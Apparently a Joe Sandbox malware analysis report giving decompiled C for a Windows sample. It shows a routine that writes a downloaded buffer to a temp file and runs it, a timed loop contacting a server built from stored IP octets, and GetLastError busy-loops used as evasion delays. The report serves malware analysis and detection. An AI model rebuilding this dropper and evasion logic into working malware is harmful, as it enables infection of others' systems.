                      				signed int _t103;
                      				long _t115;
                      				void* _t119;
                      				void* _t120;
                      				void* _t123;
                      				intOrPtr _t125;
                      				void* _t126;
                      				intOrPtr _t127;
                      				intOrPtr* _t129;
                      
                      0x01389636				_t56 = lstrcmpiW(0x138c9c8, 0x138c7c0);
                      0x0138963e				if(_t56 != 0) {
                      0x01389647					E013818D0();
                      0x0138965a					memset( &_v660, 0, 0x208);
                      0x0138966b					memset( &_v64, 0, 0x1e);
                      0x01389674					_v60 = 1;
                      0x01389680					_v56 = 0x138c9c8;
                      0x01389687					_v52.hThread = 0xe14;
                      0x0138968e					_v52.hProcess = 0x138c7c0;
                      0x01389696					_t64 =  *0x138c218( &_v64);
                      0x0138969e					if(_t64 != 0 || _v46 != _t64) {
                      0x013896b5						GetTempPathW(0x104,  &_v660);
                      0x013896c7						GetTempFileNameW( &_v660, 0, 0,  &_v660);
                      0x013896d3						_v56 = 0x138c7c0;
                      0x013896da						_v52.hProcess =  &_v660;
                      0x013896e1						_v46 = 0;
                      0x013896e8						_t71 =  *0x138c218( &_v64);
                      0x013896f0						if(_t71 != 0 || _v46 != _t71) {
                      0x00000000							goto L35;
                      0x013896ff						} else {
                      0x013896ff							_v46 = _t71;
                      0x01389706							_v56 = 0x138c9c8;
                      0x0138970d							_v52.hProcess = 0x138c7c0;
                      0x01389714							_t74 =  *0x138c218( &_v64);
                      0x0138971c							if(_t74 != 0 || _v46 != _t74) {
                      0x00000000								goto L35;
                      0x00000000							} else {
                      0x00000000								goto L8;
                      0x00000000							}
                      0x0138971c						}
                      0x0138972b					} else {
                      0x0138972b						L8:
                      0x0138972b						E01381970();
                      0x01389737						if(( *0x138c2a4 & 0x00000001) == 0) {
                      0x01389940							memset( &_v140, 0, 0x44);
                      0x01389949							_v140.cb = 0x44;
                      0x01389956							_v140.dwFlags = 0x80;
                      0x01389980							if(CreateProcessW(0x138c7c0, 0, 0, 0, 0, 0, 0, 0,  &_v140,  &_v52) != 0) {
                      0x01389985								CloseHandle(_v52);
                      0x0138998e								CloseHandle(_v52.hThread);
                      0x0138998e							}
                      0x00000000							goto L35;
                      0x0138973d						} else {
                      0x01389749							_t125 =  *0x138c040(0, 0, 6);
                      0x0138974b							_v28 = _t125;
                      0x01389750							if(_t125 == 0) {
                      0x01389996								L35:
                      0x0138999f								return 1;
                      0x01389756							} else {
                      0x0138977e								_t127 =  *0x138c0c0(_t125, 0x138c3b0, 0x138c3b0, 0x12, 0x10, 2, 0, 0x138c7c0, 0, 0, 0, 0, 0);
                      0x01389780								_v24 = _t127;
                      0x01389785								if(_t127 != 0) {
                      0x0138979c									_push(0);
                      0x0138979e									_push(0);
                      0x013897a3									_v12 = 0;
                      0x013897aa									_push( &_v32);
                      0x013897ae									_push( &_v20);
                      0x013897af									_push(0);
                      0x013897b1									_push(0);
                      0x013897b3									_push(3);
                      0x013897b5									_push(0x30);
                      0x013897b7									_push(0);
                      0x013897b9									_push(_t125);
                      0x013897c2									if( *0x138c054() == 0 && GetLastError() == 0xea) {
                      0x013897eb										_t119 = RtlAllocateHeap(GetProcessHeap(), 8, _v20);
                      0x013897ed										_v68 = _t119;
                      0x013897f2										if(_t119 != 0) {
                      0x013897f8											_push(0);
                      0x013897fa											_push(0);
                      0x013897ff											_push( &_v32);
                      0x01389803											_push( &_v20);
                      0x01389804											_push(_v20);
                      0x01389807											_push(_t119);
                      0x01389808											_push(3);
                      0x0138980a											_push(0x30);
                      0x0138980c											_push(0);
                      0x0138980e											_push(_t125);
                      0x01389817											if( *0x138c054() == 0) {
                      0x01389930												_t120 = _v16;
                      0x0138981d											} else {
                      0x0138981d												_t103 =  *0x138c3ac; // 0x0
                      0x0138982e												_t123 = _v32 * 0x2c + _t119;
                      0x01389832												_v16 = _t123;
                      0x01389835												_t120 = _v16;
                      0x0138983a												_t129 =  <  ? (_t103 & 0x0000000f) * 0x2c + _t119 : _t119;
                      0x01389840												while(_t129 < _t123) {
                      0x01389853													_t126 =  *0x138c088(_t125,  *_t129, 1);
                      0x01389857													if(_t126 != 0) {
                      0x0138985c														_push( &_v8);
                      0x0138985d														_push(0);
                      0x0138985f														_push(0);
                      0x01389861														_push(1);
                      0x01389863														_push(_t126);
                      0x0138986c														if( *0x138c0b0() == 0 && GetLastError() == 0x7a) {
                      0x0138988b															_t120 = RtlAllocateHeap(GetProcessHeap(), 8, _v8);
                      0x0138988f															if(_t120 != 0) {
                      0x0138989c																_t115 =  *0x138c0b0(_t126, 1, _t120, _v8,  &_v8);
                      0x013898a2																_v12 = _t115;
                      0x013898a7																if(_t115 == 0) {
                      0x013898b2																	HeapFree(GetProcessHeap(), _t115, _t120);
                      0x013898b2																}
                      0x013898a7															}
                      0x0138988f														}
                      0x013898b9														 *0x138c0a8(_t126);
                      0x013898b9													}
                      0x013898bf													_t125 = _v28;
                      0x013898c2													_t129 = _t129 + 0x2c;
                      0x013898c9													_t123 = _v16;
                      0x013898cc													if(_v12 == 0) {
                      0x00000000														continue;
                      0x00000000													}
                      0x00000000													break;
                      0x013898cc												}
                      0x013898d2												_t127 = _v24;
                      0x013898d2											}
                      0x013898e1											HeapFree(GetProcessHeap(), 0, _v68);
                      0x013898eb											if(_v12 != 0) {
                      0x013898f1												 *0x138c090(_t127, 1, _t120);
                      0x01389901												HeapFree(GetProcessHeap(), 0, _t120);
                      0x01389901											}
                      0x013898eb										}
                      0x013897f2									}
                      0x01389787								} else {
                      0x01389795									_t127 =  *0x138c088(_t125, 0x138c3b0, 0x10);
                      0x01389795								}
                      0x01389909								if(_t127 != 0) {
                      0x01389910									 *0x138c048(_t127, 0, 0);
                      0x01389917									 *0x138c0a8(_t127);
                      0x01389917								}
                      0x0138991e								 *0x138c0a8(_t125);
                      0x0138992f								return 1;
                      0x0138992f							}
                      0x01389750						}
                      0x01389737					}
                      0x01389646				} else {
                      0x01389646					return _t56;
                      0x01389646				}
                      			}

                      APIs
                      • lstrcmpiW.KERNEL32(0138C9C8,0138C7C0), ref: 01389636
                      • memset.NTDLL ref: 0138965A
                      • memset.NTDLL ref: 0138966B
                      • GetTempPathW.KERNEL32(00000104,?), ref: 013896B5
                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 013896C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
• Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
• Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Tempmemset$FileNamePathlstrcmpi
                      • String ID:
                      • API String ID: 2872760765-0
                      • Opcode ID: c6448fd41858f125339626758d18e3c16f772bb2a0c5c312d1046456115e641a
                      • Instruction ID: 94ef70f7265ad30db4daead9f7af627c6166f9cc282db463fb739f1fb84352e2
                      • Opcode Fuzzy Hash: c6448fd41858f125339626758d18e3c16f772bb2a0c5c312d1046456115e641a
                      • Instruction Fuzzy Hash: 82A16E71A40309BFEB31AFA4EC89FEE7B7CAB44B49F141015F605F6180D77499458B64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 259 1389a90-1389ace memset * 2 260 1389ad0-1389ad6 259->260 261 1389ad8 GetLastError 260->261 262 1389ade-1389ae5 260->262 261->262 262->260 263 1389ae7-1389b59 GetTickCount call 1382240 call 1381830 _snwprintf GetProcessHeap HeapFree 262->263 268 1389b60-1389b66 263->268 269 1389b68 GetLastError 268->269 270 1389b6e-1389b75 268->270 269->270 270->268 271 1389b77-1389b9a CreateFileW 270->271 272 1389ba0-1389ba6 271->272 273 1389ba8 GetLastError 272->273 274 1389bae-1389bb5 272->274 273->274 274->272 275 1389bb7-1389bba 274->275 276 1389bbc-1389bce WriteFile CloseHandle 275->276 277 1389bd4 275->277 276->277 278 1389bd6 277->278 279 1389bd8-1389bde 278->279 280 1389be0 GetLastError 279->280 281 1389be6-1389bed 279->281 280->281 281->279 282 1389bef-1389c14 CreateProcessW 281->282 283 1389c2e-1389c46 CloseHandle * 2 282->283 284 1389c16-1389c25 Sleep 282->284 284->278 285 1389c27-1389c2d 284->285
                      C-Code - Quality: 93%
                      			E01389A90(void* __ecx, long __edx) {
                      				long _v8;
                      				void* _v12;
                      				struct _PROCESS_INFORMATION _v28;
                      				struct _STARTUPINFOW _v100;
                      				char _v228;
                      				short _v748;
                      				signed int _t28;
                      				int _t46;
                      				void* _t52;
                      				void* _t59;
                      				void* _t60;
                      				short _t61;
                      				void* _t64;
                      				void* _t65;
                      				void* _t66;
                      				void* _t67;
                      				void* _t68;
                      
                      				_v8 = __edx;
                      				_t52 = __ecx;
                      				memset( &_v100, 0, 0x44);
                      				memset( &_v28, 0, 0x10);
                      				_v100.cb = 0x44;
                      				_v100.dwFlags = 0x80;
                      				_t61 = 0;
                      				do {
                      					if(_t61 < 0xfa00) {
                      						GetLastError();
                      					}
                      					_t61 = _t61 + 1;
                      				} while (_t61 < 0x8000000);
                      				_t28 = GetTickCount();
                      				_t7 = (_t28 & 0x0000000f) + 4; // 0x4
                      				E01382240( &_v228, _t7);
                      				 *((short*)(_t68 + (_t28 & 0x0000000f) * 2 - 0xd8)) = 0;
                      				E01381830(0x1381370, 0xc, 0x7d1cc189,  &_v12);
                      				_t64 = _v12;
                      				 *0x138c200( &_v748, 0x104, _t64, 0x138c5b8,  &_v228);
                      				HeapFree(GetProcessHeap(), 0, _t64);
                      				_t65 = 0;
                      				do {
                      					if(_t65 < 0xfa00) {
                      						GetLastError();
                      					}
                      					_t65 = _t65 + 1;
                      				} while (_t65 < 0x8000000);
                      				_t59 = CreateFileW( &_v748, 0x40000000, 0, 0, 2, 0x80, 0);
                      				_t66 = 0;
                      				do {
                      					if(_t66 < 0xfa00) {
                      						GetLastError();
                      					}
                      					_t66 = _t66 + 1;
                      				} while (_t66 < 0x8000000);
                      				if(_t59 != 0xffffffff) {
                      					WriteFile(_t59, _t52, _v8,  &_v8, 0);
                      					CloseHandle(_t59);
                      				}
                      				_t60 = 0;
                      				do {
                      					_t67 = 0;
                      					do {
                      						if(_t67 < 0xfa00) {
                      							GetLastError();
                      						}
                      						_t67 = _t67 + 1;
                      					} while (_t67 < 0x8000000);
                      					_t46 = CreateProcessW( &_v748, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
                      					if(_t46 != 0) {
                      						CloseHandle(_v28);
                      						return CloseHandle(_v28.hThread);
                      					} else {
                      						goto L20;
                      					}
                      					L23:
                      					L20:
                      					_t60 = _t60 + 1;
                      					Sleep(0xc8);
                      				} while (_t60 < 0x10);
                      				return _t46;
                      				goto L23;
			}

Statement addresses for the listing above (side column of the decompilation, flattened; 0x00000000 marks statements without an address): 0x01389aa1, 0x01389aa7, 0x01389aa9, 0x01389ab7, 0x01389ac0, 0x01389ac7, 0x01389ace, 0x01389ad0, 0x01389ad6, 0x01389ad8, 0x01389ad8, 0x01389ade, 0x01389adf, 0x01389ae7, 0x01389af8, 0x01389afb, 0x01389b07, 0x01389b1d, 0x01389b22, 0x01389b3e, 0x01389b51, 0x01389b57, 0x01389b60, 0x01389b66, 0x01389b68, 0x01389b68, 0x01389b6e, 0x01389b6f, 0x01389b96, 0x01389b98, 0x01389ba0, 0x01389ba6, 0x01389ba8, 0x01389ba8, 0x01389bae, 0x01389baf, 0x01389bba, 0x01389bc7, 0x01389bce, 0x01389bce, 0x01389bd4, 0x01389bd6, 0x01389bd6, 0x01389bd8, 0x01389bde, 0x01389be0, 0x01389be0, 0x01389be6, 0x01389be7, 0x01389c0c, 0x01389c14, 0x01389c31, 0x01389c46, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x01389c16, 0x01389c1b, 0x01389c1c, 0x01389c22, 0x01389c2d, 0x00000000

                      APIs
                      • memset.NTDLL ref: 01389AA9
                      • memset.NTDLL ref: 01389AB7
                      • GetLastError.KERNEL32 ref: 01389AD8
                      • GetTickCount.KERNEL32 ref: 01389AE7
                      • _snwprintf.NTDLL ref: 01389B3E
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01389B4A
                      • HeapFree.KERNEL32(00000000), ref: 01389B51
                      • GetLastError.KERNEL32 ref: 01389B68
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01389B90
                      • GetLastError.KERNEL32 ref: 01389BA8
                      • WriteFile.KERNEL32(00000000,?,01388F6C,01388F6C,00000000), ref: 01389BC7
                      • CloseHandle.KERNEL32(00000000), ref: 01389BCE
                      • GetLastError.KERNEL32 ref: 01389BE0
                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 01389C0C
                      • Sleep.KERNEL32(000000C8), ref: 01389C1C
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
• Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
• Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$CreateFileHeapProcessmemset$CloseCountFreeHandleSleepTickWrite_snwprintf
                      • String ID:
                      • API String ID: 2430354324-0
                      • Opcode ID: 94c9858fe7807e3cf6766bb418586e7017deb49aeec0a9553ae711c30f2d8d3f
                      • Instruction ID: 5d8421b309e7356d50f9975e704c4059ceb46c220cd43bcf5805cbb2f5120c1d
                      • Opcode Fuzzy Hash: 94c9858fe7807e3cf6766bb418586e7017deb49aeec0a9553ae711c30f2d8d3f
                      • Instruction Fuzzy Hash: 7441C772940314ABEB21ABA4EC8DFEDBB7DEB44315F400161FA0AE7584CB3059858BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E01388520(void* _a4, long* _a8) {
                      				char _v8;
                      				void* _v12;
                      				intOrPtr _v16;
                      				void* _v20;
                      				char _v24;
                      				void* _v28;
                      				char _v32;
                      				void* _v40;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				char _v60;
                      				char _v188;
                      				void* _t42;
                      				signed char* _t62;
                      				void* _t64;
                      				void _t79;
                      				long _t82;
                      				long* _t83;
                      				signed char* _t88;
                      				void* _t92;
                      				long* _t103;
                      				void* _t104;
                      				void* _t105;
                      
                      				_v32 = 0x10;
                      				_t42 = E01388420( *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v24);
                      				_t103 = _a8;
                      				_v28 = _t42;
                      				_t83 =  &(_t103[1]);
                      				 *_t83 = 0;
                      				 *_t103 = 0;
                      				if(_t42 != 0) {
                      					if(E01388700( &_v40,  &_v32) != 0) {
                      						if(E013823F0( &_v40,  &_v12) != 0) {
                      							E01381830(0x138c020, 0xc, 0x58619fa4,  &_a4);
                      							_t88 =  *0x138c298; // 0x0
                      							_t104 = _a4;
                      							 *0x138c200( &_v188, 0x40, _t104, _t88[3] & 0x000000ff, _t88[2] & 0x000000ff, _t88[1] & 0x000000ff,  *_t88 & 0x000000ff);
                      							HeapFree(GetProcessHeap(), 0, _t104);
                      							_t62 =  *0x138c298; // 0x0
                      							_push(_t88);
                      							_t64 = E01381C50( &_v60,  &_v188, _t62[4] & 0x0000ffff);
                      							_t105 = _v12;
                      							if(_t64 != 0) {
                      								_push(_v8);
                      								_push(_t105);
                      								if(E01381D40( &_v60) != 0) {
                      									if(E01381E50( &_v60,  &_v12,  &_v8) != 0) {
                      										if(E01382530( &_v12,  &_v20) != 0) {
                      											_t92 = _v20;
                      											_t79 =  *_t92;
                      											 *_t83 = _t79;
                      											if(_t79 < 0x4000000) {
                      												_t82 = E013884C0(_t92 + 4, _v16 - 4, _t83);
                      												_t92 = _v20;
                      												 *_t103 = _t82;
                      											}
                      											HeapFree(GetProcessHeap(), 0, _t92);
                      										}
                      										HeapFree(GetProcessHeap(), 0, _v12);
                      									}
                      									 *0x138c234(_v52);
                      								}
                      								 *0x138c234(_v56);
                      								 *0x138c234(_v60);
                      							}
                      							HeapFree(GetProcessHeap(), 0, 0);
                      							HeapFree(GetProcessHeap(), 0, _t105);
                      						}
                      						HeapFree(GetProcessHeap(), 0, _v40);
                      					}
                      					HeapFree(GetProcessHeap(), 0, _v28);
                      				}
                      				return 0 |  *_t103 != 0x00000000;
			}

Statement addresses for the listing above (side column of the decompilation, flattened): 0x01388538, 0x0138853f, 0x01388544, 0x0138854a, 0x0138854d, 0x01388550, 0x01388556, 0x0138855e, 0x01388571, 0x01388588, 0x013885a1, 0x013885a6, 0x013885ac, 0x013885cc, 0x013885df, 0x013885e5, 0x013885f0, 0x013885f9, 0x013885fe, 0x01388606, 0x0138860c, 0x01388612, 0x01388620, 0x01388636, 0x01388649, 0x0138864b, 0x0138864e, 0x01388650, 0x01388657, 0x01388663, 0x01388668, 0x0138866e, 0x0138866e, 0x0138867a, 0x0138867a, 0x0138868c, 0x0138868c, 0x01388695, 0x01388695, 0x0138869e, 0x013886a7, 0x013886a7, 0x013886b8, 0x013886c8, 0x013886c8, 0x013886da, 0x013886da, 0x013886ec, 0x013886ec, 0x013886ff

                      APIs
                        • Part of subcall function 01388420: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 01388468
                        • Part of subcall function 01388420: RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0138846F
                        • Part of subcall function 01388420: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 01388493
                        • Part of subcall function 01388420: HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 0138849A
                        • Part of subcall function 01388700: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,0138856F), ref: 01388746
                        • Part of subcall function 01388700: RtlAllocateHeap.NTDLL(00000000), ref: 0138874D
                        • Part of subcall function 01388700: memcpy.NTDLL(00000000,?,?), ref: 013887A9
                      • _snwprintf.NTDLL ref: 013885CC
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 013885D8
                      • HeapFree.KERNEL32(00000000), ref: 013885DF
                        • Part of subcall function 01381C50: memset.NTDLL ref: 01381C70
                        • Part of subcall function 01381C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01381C9C
                        • Part of subcall function 01381C50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 01381CAE
                        • Part of subcall function 01381C50: RtlAllocateHeap.NTDLL(00000000), ref: 01381CB5
                        • Part of subcall function 01381C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01381CD0
                        • Part of subcall function 01381C50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 01381CED
                        • Part of subcall function 01381C50: HeapFree.KERNEL32(00000000), ref: 01381CF4
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01388673
                      • HeapFree.KERNEL32(00000000), ref: 0138867A
                        • Part of subcall function 013884C0: GetProcessHeap.KERNEL32(00000000,01388668,?,?,?,01388668,?), ref: 013884D5
                        • Part of subcall function 013884C0: RtlAllocateHeap.NTDLL(00000000), ref: 013884DC
                        • Part of subcall function 013884C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 013884FF
                        • Part of subcall function 013884C0: HeapFree.KERNEL32(00000000), ref: 01388506
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01388685
                      • HeapFree.KERNEL32(00000000), ref: 0138868C
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013886B1
                      • HeapFree.KERNEL32(00000000), ref: 013886B8
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 013886C1
                      • HeapFree.KERNEL32(00000000), ref: 013886C8
                        • Part of subcall function 01381D40: GetProcessHeap.KERNEL32(00000000,00000000,?,0138861B), ref: 01381DA2
                        • Part of subcall function 01381D40: HeapFree.KERNEL32(00000000,?,0138861B), ref: 01381DA9
                        • Part of subcall function 01381E50: GetProcessHeap.KERNEL32(00000000,?,?,?,?,01388631), ref: 01381E89
                        • Part of subcall function 01381E50: RtlAllocateHeap.NTDLL(00000000), ref: 01381E90
                        • Part of subcall function 01381E50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 01381EFB
                        • Part of subcall function 01381E50: HeapFree.KERNEL32(00000000), ref: 01381F02
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 013886D3
                      • HeapFree.KERNEL32(00000000), ref: 013886DA
                        • Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
                        • Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 013886E5
                      • HeapFree.KERNEL32(00000000), ref: 013886EC
                        • Part of subcall function 013823F0: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 01382422
                        • Part of subcall function 013823F0: RtlAllocateHeap.NTDLL(00000000), ref: 01382429
                        • Part of subcall function 013823F0: memcpy.NTDLL(01388583,?,?), ref: 01382467
                        • Part of subcall function 013823F0: GetProcessHeap.KERNEL32(00000000,01388583), ref: 0138250A
                        • Part of subcall function 013823F0: HeapFree.KERNEL32(00000000), ref: 01382511
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
• Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
• Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$Free$Allocate$ByteCharMultiWidememcpy$_snwprintfmemset
                      • String ID:
                      • API String ID: 876682111-0
                      • Opcode ID: 5b3ad27230d632216a19bfec4af72c17ac12de9a796cc36c84571fa4a047e613
                      • Instruction ID: cda4ff398b461d208e4216b19f9032d147bad65100dcb809f5f890e4b0dbd3bf
                      • Opcode Fuzzy Hash: 5b3ad27230d632216a19bfec4af72c17ac12de9a796cc36c84571fa4a047e613
                      • Instruction Fuzzy Hash: 70513B72900305AFEF10ABE4EC49BEEBB7DAF08309F144450F609D6194EB319A55CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E01388DD0(void* __edx) {
                      				void* _v16;
                      				void* _v24;
                      				char _v28;
                      				void* _v32;
                      				char _v36;
                      				intOrPtr _v44;
                      				void* _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				long _v72;
                      				void* _v76;
                      				void* _v84;
                      				void* _v92;
                      				signed int _t28;
                      				long _t29;
                      
                      				_t28 = GetTickCount();
                      				if(_t28 <  *0x138c278) {
                      					L24:
                      					return _t28;
                      				} else {
                      					_t29 =  *0x138c280; // 0x0
                      					_t28 = _t29 - 1;
                      					if(_t28 > 3) {
                      						goto L24;
                      					} else {
                      						switch( *((intOrPtr*)(_t28 * 4 +  &M01389044))) {
                      							case 0:
                      								 *0x138c280 = 2;
                      								return _t28;
                      								goto L25;
                      							case 1:
                      								 *0x138c280 = 0;
                      								__eax = E01389620(__ecx, __edx);
                      								__eax = __eax;
                      								if(__eax == 0) {
                      									 *0x138c280 = 3;
                      									_pop(__esi);
                      									return __eax;
                      								} else {
                      									if(__eax != 0) {
                      										goto L24;
                      									} else {
                      										__eax = SetEvent( *0x138c29c);
                      										_pop(__esi);
                      										return __eax;
                      									}
                      								}
                      								goto L25;
                      							case 2:
                      								 *0x138c280 = 0;
                      								 *0x138c294 = 0x1381270;
                      								 *0x138c298 = 0x1381270;
                      								__eax = E013822E0();
                      								__eax =  *0x138c02c; // 0x13812f8
                      								 *0x138c26c = __eax;
                      								__eax =  *0x138c030; // 0x6a
                      								 *0x138c268 = 0x138c2a8;
                      								 *0x138c270 = __eax;
                      								 *0x138c280 = 4;
                      								_pop(__esi);
                      								return __eax;
                      								goto L25;
                      							case 3:
                      								__ecx =  &_v28;
                      								 *0x138c280 = 0;
                      								__eax = E01388BB0( &_v28);
                      								__ecx =  &_v36;
                      								__eax = E01388D50( &_v36);
                      								__eax =  *0x138cbd0; // 0x0
                      								_push(0x138c2a8);
                      								_v32 = __eax;
                      								_v44 = 0x138c2a8;
                      								_v44 =  *0x138c1e4();
                      								__eax =  *0x138c2a4; // 0x0
                      								_v52 = __eax;
                      								do {
                      									__ecx =  &_v24;
                      									__esi = 0xdbba0;
                      									__eax = E01388920( &_v24);
                      									__ecx =  &_v16;
                      									__eax = E0138A7A0( &_v16);
                      									__edx =  &_v52;
                      									__ecx =  &_v84;
                      									if(E01389F80( &_v84,  &_v52) != 0) {
                      										 &_v92 =  &_v84;
                      										if(E01388520( &_v84,  &_v92) == 0) {
                      											__eax =  *0x138c298; // 0x0
                      											__esi = 0x7530;
                      											__eax = __eax + 8;
                      											 *0x138c298 = __eax;
                      											 *0x138c298 = __eax;
                      										} else {
                      											__eax = E013899A0();
                      											__ecx = 0;
                      											__eax = E013888B0(0);
                      											__ecx = 0;
                      											__eax = E0138A750(0);
                      											__edx =  &_v76;
                      											__ecx =  &_v92;
                      											if(E0138A180( &_v92,  &_v76) != 0) {
                      												__eax = E01381750();
                      												__edx = _v72;
                      												if(__edx != 0) {
                      													__ecx = _v76;
                      													__eax = E01389A90(_v76, __edx);
                      												}
                      												__eax = E01381750();
                      												__edx = _v64;
                      												if(__edx != 0) {
                      													__ecx = _v68;
                      													__eax = E01388990(_v68, __edx);
                      													__esi = 0;
                      												}
                      												__eax = E01381750();
                      												__edx = _v56;
                      												if(__edx != 0) {
                      													__ecx = _v60;
                      													__eax = E0138A810(_v60, __edx);
                      													__esi = 0;
                      												}
                      											}
                      											GetProcessHeap() = HeapFree(__eax, 0, _v92);
                      										}
                      										GetProcessHeap() = HeapFree(__eax, 0, _v84);
                      									}
                      									GetProcessHeap() = HeapFree(__eax, 0, _v24);
                      									GetProcessHeap() = HeapFree(__eax, 0, _v16);
                      								} while (__esi == 0);
                      								__eax = GetTickCount();
                      								__eax = __eax + __esi;
                      								 *0x138c280 = 4;
                      								 *0x138c278 = __eax;
                      								GetProcessHeap() = HeapFree(__eax, 0, _v32);
                      								goto L24;
                      						}
                      					}
                      				}
                      				L25:
                      			}

                      Address column (one entry per statement above; the side-by-side layout was lost in extraction): 0x01388dda to 0x01389041.

                      APIs
                      • GetTickCount.KERNEL32 ref: 01388DDA
                      • SetEvent.KERNEL32 ref: 01388E34
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0138C2A8), ref: 01388ED6
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01388FA2
                      • HeapFree.KERNEL32(00000000), ref: 01388FA9
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01388FD8
                      • HeapFree.KERNEL32(00000000), ref: 01388FDF
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01388FEB
                      • HeapFree.KERNEL32(00000000), ref: 01388FF2
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01388FFE
                      • HeapFree.KERNEL32(00000000), ref: 01389005
                      • GetTickCount.KERNEL32 ref: 01389013
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01389030
                      • HeapFree.KERNEL32(00000000), ref: 01389037
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$FreeProcess$CountTick$Eventlstrlen
                      • String ID:
                      • API String ID: 1747682351-0
                      • Opcode ID: a050a7ca3c2160777087be1f30ac19362c071eab03ae79cc88ea413f3747263c
                      • Instruction ID: 4bffe60d9682e9ca24144cc58acdcbe8fc71abb1746181c0cca7e053e46872bd
                      • Opcode Fuzzy Hash: a050a7ca3c2160777087be1f30ac19362c071eab03ae79cc88ea413f3747263c
                      • Instruction Fuzzy Hash: C8519F725043019FEB20FFA8F885BDEBBA9FB94318F441559F64987688DB319508CB72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph (basic blocks of E01388BB0 with their successors; the Executed / Not Executed colouring of the graph image is not recoverable in text)

                      • 382 1388bb0-1388c0c GetModuleFileNameW lstrlenW -> 383, 384
                      • 383 1388c28-1388c35 call 1382110 -> 391, 392
                      • 384 1388c0e -> 385
                      • 385 1388c10-1388c14 -> 387, 388
                      • 387 1388c25 -> 383
                      • 388 1388c16-1388c21 -> 385, 390
                      • 390 1388c23 -> 383
                      • 391 1388c58-1388c72 GetProcessHeap RtlAllocateHeap -> 394, 395
